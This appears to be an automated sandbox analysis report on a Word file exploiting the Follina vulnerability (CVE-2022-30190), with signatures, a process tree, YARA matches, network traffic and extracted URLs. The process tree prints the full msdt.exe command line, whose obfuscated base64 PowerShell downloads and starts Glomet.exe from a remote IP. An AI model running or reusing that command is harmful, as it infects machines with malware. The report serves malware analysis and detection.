Windows Analysis Report
20220714 DWG.doc

Overview

General Information

Sample Name: 20220714 DWG.doc
Analysis ID: 665041
MD5: 5fd0deaaca6ac9645ba3e9aa8af3311c
SHA1: 4823c45cde3606a5189462a8c4441686706d04f3
SHA256: b78c36823ab0b86b683d165e53405855b8e910c5011997e5a4a4620200cffc0a
Tags: doc

Detection

Follina CVE-2022-30190
Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Obfuscated command line found
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Binary contains a suspicious time stamp
PE file contains more sections than normal
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • WINWORD.EXE (PID: 6276 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • MSOSYNC.EXE (PID: 6604 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
    • msdt.exe (PID: 7084 cmdline: C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'aWV4IChuZXctb2JqZWN0IHN5c3RlbS5uZXQud2ViY2xpZW50KS5kb3dubG9hZGZpbGUoImh0dHA6Ly80NS4xNDEuMjM3LjE4L0dsb21ldC5leGUiLCJjOlxwcm9ncmFtZGF0YVxHbG9tZXQuZXhlIik7U3RhcnQtUHJvY2VzcyAiYzpccHJvZ3JhbWRhdGFcR2xvbWV0LmV4ZSI='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
    • splwow64.exe (PID: 6808 cmdline: C:\Windows\splwow64.exe 12288 MD5: 8D59B31FF375059E3C32B17BF31A76D5)
  • csc.exe (PID: 4908 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q0vyiohn\q0vyiohn.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 5664 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES216A.tmp" "c:\Users\user\AppData\Local\Temp\q0vyiohn\CSC14339BC3D3E94BA0AEA5453DEFD3E9E.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • csc.exe (PID: 5396 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ea13q231\ea13q231.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 5904 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3EE5.tmp" "c:\Users\user\AppData\Local\Temp\ea13q231\CSCF24C6B632D84EA4B9FDE29780CB1444.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • Glomet.exe (PID: 6300 cmdline: "C:\programdata\Glomet.exe" MD5: 7A560CE2C90976F306953F3BF4EFEBF9)
    • cmd.exe (PID: 7112 cmdline: CMD.EXE /C SET /A "0x00^75" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • csc.exe (PID: 3400 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\llhoph4d\llhoph4d.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 6992 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDEDE.tmp" "c:\Users\user\AppData\Local\Temp\llhoph4d\CSCA6DEB1F21B847AF87589FE9AEBF81D1.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000D.00000002.576330720.0000000000C60000.00000004.00000020.00020000.00000000.sdmp | SUSP_PS1_Msdt_Execution_May22 | Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation | Nasreddine Bencherchali, Christian Burkard
  • 0x28b2:$a: PCWDiagnostic
  • 0x2888:$sa1: msdt.exe
  • 0x289a:$sa3: ms-msdt
  • 0x2994:$sb3: IT_BrowseForFile=
0000000D.00000002.576330720.0000000000C60000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security
0000000D.00000002.576021489.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp | SUSP_PS1_Msdt_Execution_May22 | Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation | Nasreddine Bencherchali, Christian Burkard
  • 0x2338:$a: PCWDiagnostic
  • 0x22d0:$sa1: msdt.exe
  • 0x230c:$sa1: msdt.exe
  • 0x2848:$sa1: msdt.exe
  • 0x2320:$sa3: ms-msdt
  • 0x241c:$sb3: IT_BrowseForFile=
0000000D.00000002.576021489.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security
0000000D.00000002.577239005.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp | SUSP_PS1_Msdt_Execution_May22 | Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation | Nasreddine Bencherchali, Christian Burkard
  • 0x3766:$a: PCWDiagnostic
  • 0x3f76:$a: PCWDiagnostic
  • 0x16414:$a: PCWDiagnostic
  • 0x6f48:$sa1: msdt.exe
  • 0x18d16:$sa1: msdt.exe
  • 0x25638:$sa1: msdt.exe
  • 0x278f0:$sb3: IT_BrowseForFile=
      No Sigma rule has matched
      No Snort rule has matched

      AV Detection

      Source: 20220714 DWG.doc | Virustotal: Detection: 8%

      Exploits

      Source: Yara match | File source: 0000000D.00000002.576330720.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000D.00000002.576021489.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000D.00000002.576945424.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: C:\ProgramData\Glomet.exe | Registry value created: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\Gratinr\Wr242\Boomerangernes\Hypercenosis
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
      Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.29.dr
      Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.29.dr
      Source: C:\ProgramData\Glomet.exe | Code function: 29_2_00405A19 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,29_2_00405A19
      Source: C:\ProgramData\Glomet.exe | Code function: 29_2_004065CE FindFirstFileA,FindClose,29_2_004065CE
      Source: C:\ProgramData\Glomet.exe | Code function: 29_2_004027AA FindFirstFileA,29_2_004027AA

      Software Vulnerabilities

      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process created: C:\Windows\SysWOW64\msdt.exe
      Source: global traffic | TCP traffic: 192.168.2.3:49743 -> 45.141.237.18:80
      Source: global traffic | TCP traffic: 192.168.2.3:49744 -> 45.141.237.18:80
      Source: winword.exe | Memory has grown: Private usage: 0MB later: 110MB
      Source: global traffic | HTTP traffic detected:
        GET /Glomet.exe HTTP/1.1
        Host: 45.141.237.18
        Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected:
        HTTP/1.1 200 OK
        Content-Type: application/octet-stream
        Last-Modified: Thu, 14 Jul 2022 21:48:58 GMT
        Accept-Ranges: bytes
        ETag: "7dc29185cb97d81:0"
        Server: Microsoft-IIS/10.0
        Date: Fri, 15 Jul 2022 13:28:25 GMT
        Content-Length: 346688
      Source: global traffic | HTTP traffic detected:
        GET /Glomet.html HTTP/1.1
        Accept: */*
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
        Accept-Encoding: gzip, deflate
        Host: 45.141.237.18
        Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected:
        GET /Glomet.html HTTP/1.1
        Accept: */*
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
        Accept-Encoding: gzip, deflate
        Host: 45.141.237.18
        If-Modified-Since: Thu, 14 Jul 2022 16:59:59 GMT
        If-None-Match: "80119226a397d81:0"
        Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected:
        GET /icons/ubuntu-logo.png HTTP/1.1
        Accept: */*
        Referer: http://45.141.237.18/Glomet.html
        Accept-Language: en-US
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
        Host: 45.141.237.18
        Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected:
        HTTP/1.1 404 Not Found
        Content-Type: text/html
        Server: Microsoft-IIS/10.0
        Date: Fri, 15 Jul 2022 13:26:43 GMT
        Content-Length: 1245
      Source: global traffic | HTTP traffic detected:
        HTTP/1.1 200 OK
        Content-Type: text/html
        Content-Encoding: gzip
        Last-Modified: Thu, 14 Jul 2022 16:59:59 GMT
        Accept-Ranges: bytes
        ETag: "80119226a397d81:0"
        Vary: Accept-Encoding
        Server: Microsoft-IIS/10.0
        Date: Fri, 15 Jul 2022 13:26:41 GMT
        Content-Length: 4357
      Source: unknown | TCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: ~WRS{D2D7FF17-FD00-4D6F-9BD0-D27E7B55D2C5}.tmp.0.dr | String found in binary or memory: http://45.141.237.18/Glomet.html
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
      Source: battery-level-90-charging-symbolic.svg.29.dr | String found in binary or memory: http://creativecommons.org/licenses/by-sa/4.0/
      Source: battery-level-90-charging-symbolic.svg.29.dr | String found in binary or memory: http://creativecommons.org/ns#
      Source: battery-level-90-charging-symbolic.svg.29.dr | String found in binary or memory: http://creativecommons.org/ns#Attribution
      Source: battery-level-90-charging-symbolic.svg.29.dr | String found in binary or memory: http://creativecommons.org/ns#DerivativeWorks
      Source: battery-level-90-charging-symbolic.svg.29.dr | String found in binary or memory: http://creativecommons.org/ns#Distribution
      Source: battery-level-90-charging-symbolic.svg.29.dr | String found in binary or memory: http://creativecommons.org/ns#Notice
      Source: battery-level-90-charging-symbolic.svg.29.dr | String found in binary or memory: http://creativecommons.org/ns#Reproduction
      Source: battery-level-90-charging-symbolic.svg.29.dr | String found in binary or memory: http://creativecommons.org/ns#ShareAlike
      Source: msdt.exe, 0000000D.00000002.581158371.0000000000D61000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
      Source: 678899CC.htm.0.dr, Glomet[1].htm.0.dr, FF013E73.htm.0.dr | String found in binary or memory: http://httpd.apache.org/docs/2.4/mod/mod_userdir.html
      Source: Glomet.exe, Glomet.exe, 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, Glomet.exe, 0000001D.00000000.532501421.000000000040A000.00000008.00000001.01000000.0000000C.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_Error
      Source: Glomet.exe, 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, Glomet.exe, 0000001D.00000000.532501421.000000000040A000.00000008.00000001.01000000.0000000C.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: http://weather.service.msn.com/data.aspx
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://addinsinstallation.store.office.com/app/download
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://addinslicensing.store.office.com/apps/remove
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://analysis.windows.net/powerbi/api
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://api.aadrm.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://api.aadrm.com/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://api.addins.omex.office.net/appstate/query
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://api.addins.store.office.com/addinstemplate
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://api.addins.store.office.com/app/query
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://api.cortana.ai
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://api.diagnostics.office.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://api.diagnosticssdf.office.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://api.microsoftstream.com/api/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://api.office.net
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://api.onedrive.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://apis.live.net/v5.0/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://arc.msn.com/v4/api/selection
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://augloop.office.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://augloop.office.com/v2
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://autodiscover-s.outlook.com/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
      Source: 678899CC.htm.0.dr, Glomet[1].htm.0.dr, FF013E73.htm.0.dr | String found in binary or memory: https://bugs.launchpad.net/ubuntu/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://cdn.entity.
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://client-office365-tas.msedge.net/ab
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://clients.config.office.net/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://config.edge.skype.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://config.edge.skype.com/config/v1/Office
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://config.edge.skype.com/config/v2/Office
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://cortana.ai
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr | String found in binary or memory: https://cortana.ai/api
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://cr.office.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://dataservice.o365filtering.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://dataservice.o365filtering.com/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://dev.cortana.ai
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://devnull.onenote.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://directory.services.
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://edu-mathreco-prod.trafficmanager.net
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://edu-mathsolver-prod.trafficmanager.net
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://enrichment.osi.office.net/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://graph.ppe.windows.net
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://graph.ppe.windows.net/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://graph.windows.net
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://graph.windows.net/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://incidents.diagnostics.office.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
